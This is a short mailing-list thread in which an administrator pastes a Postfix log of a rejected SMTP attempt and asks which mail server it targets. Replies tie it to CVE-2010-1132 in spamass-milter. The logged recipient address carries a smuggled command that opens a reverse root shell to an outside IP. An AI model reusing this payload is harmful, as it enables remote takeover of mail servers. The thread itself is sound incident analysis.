Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<bl...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>
Of course this particular message was blocked at the HELO stage. But
I was curious as to what attack vector this was trying to exploit and
against what mail transport agent? I searched the web quite a bit and
didn't see this particular attack discussed anywhere.
Obviously the /dev/tcp/host/port part is trying to connect back to a
C&C host and attach the network connection to a root shell. I
understand the shell scripting part of the attack fine.
The remote mta security exploit I couldn't locate references to was
the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is
vulnerable to "+:|" in the To address? Or perhaps none are and this
is simply a failed probe attempt?
Thanks,
Bob
Likely related to CVE-2010-1132:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1132
http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html
--
Sahil Tandon <sa...@FreeBSD.org>
Ah... Yes that does look like it.
Thanks!
Bob
looks like trying allready fixed bug on spamass-milter
http://savannah.nongnu.org/bugs/?29136
--
Best Regards
MfG Robert Schetterer
Germany/Munich/Bavaria